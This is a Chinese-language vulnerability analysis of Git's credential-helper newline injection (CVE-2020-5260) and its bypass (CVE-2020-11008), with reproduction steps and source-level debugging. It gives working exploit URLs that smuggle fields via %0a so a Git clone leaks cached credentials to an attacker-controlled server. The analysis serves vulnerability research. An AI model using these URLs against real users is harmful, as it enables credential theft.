漏洞简述
CVE-2020-5260
url中包含%0a
,导致git的credential.helper在查找ur仓库地址对应的账密时,错误匹配到了攻击者指定条件的credential。
从而获取受害者本地缓存的账密
漏洞复现
漏洞比较简单,但复现时由于环境原因多次未能成功。
最初在windows环境及wsl中复现,但尝试 多个版本均未能成功。
后来在虚拟机kali 64位环境下自带的2.24.0版本 复现成功
为了便于调试,使用2.24.0版本编译重装
安装编译工具 apt install -y build-essential
安装git需要的一些库 apt install -y libcurl4-gnutls-dev libexpat1-dev gettext libz-dev libssl-dev
开始编译安装:
1
2
3
4
5
6git clone https://github.com/git/git && cd git
git checkout -b build v2.24.0
make configure
./configure --prefix=/usr
make && make install在本地缓存密码
1
2
3
4
5git config --global credential.helper store
// 输入账号密码,将其缓存在本地
git clone https://github.com/your-repo && cd your-repo
git push启动接收账密的server
1 | go run poc.go |
- 克隆恶意仓库漏洞复现就完成了,没什么难度
1
git clone 'http://localhost:8088?%0ahost=github.com%0aprotocol=https'
漏洞分析
fprintf时value中包含\n
,导致写入了新行。
1 | //credential.c |
在新行中覆盖掉protocol和host,如
1 | protocol = https |
导致读取credential时读的是github.com
,但是仓库地址是example.com
看起来很简单,但是不了解git源码,完全不知道c的值以及credential读取的方式。
深入分析
看了几天代码,仍然对git的流程不是很了解。
于是决定用gdb进行调试分析,用到的命令如下
1 | gdb git |
经过调试了解到git频繁使用子进程来处理任务,先使用fork创建一个子进程,然后在子进程中调用execv来执行实际任务,在父进程中通过io传递参数
git clone 'http://localhost:8088?%0ahost=github.com%0aprotocol=https'
的实际处理过程大致如下
调用git-remote-http origin
http://localhost:8088?%0ahost=github.com%0aprotocol=https
父进程会往stdin中写入capabilities
option progress true
option verbosity 1
list在
http.c::http_request_reauth
调用credential_fill(&http_auth)
来获取本地缓存的账密
其中http_auth通过credential_from_url
解析仓库地址得到credential_fill最终调用
run_credential_helper
,创建子进程获取账密
实际查询账密的进程为git-credential-store get
父进程将要查询的credential写入io,即credential_write(c, fp);
credential.c:L232
在
credential-store.c::cmd_main
调用lookup_credential
查询账密,返回给父进程
这个过程中函数credential_match
有点意思,先按住不表
漏洞的调用过程如上,url中的%0a
在第3步时生效,导致父进程写入的查询条件如下
1 | protocol=http |
于是lookup_credential
查询出来的账密是github.com的账密。
再额外分析一下credential_match
1 | //credential.c |
看CHECK
的定义,如果要查询的字段x的值为空,则触发短路返回true。
如果有机会使host为NULL,也可以达到这个漏洞效果。
Bypass CVE-2020-5260
CVE-2020-11008
虽然说是bypass,但PoC完全没有变。
分析一下官方的修复diff v2.24.1 v2.24.2
1 | //credential.c |
增加了check_url_component
,该函数检测到credential的值中存在\n
会返回-1
在credential_from_url中增加了这个判断,返回值<0时会用credential_clear
清空credential
这个就有意思了,前面分析过get-credential-store get
,如果父进程传入的credential为空,那会直接匹配到第一个缓存的密码
也就是说可以通过\n
清空credential,从而匹配到账密
1 | git clone 'http://localhost:8088?%0axxx' |
参考链接
https://git-scm.com/docs/api-credentials
http://schacon.github.io/git/user-manual.html#birdview-on-the-source-code
https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=437011 //poc.go
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5260
https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
https://git-scm.com/docs/gitcredentials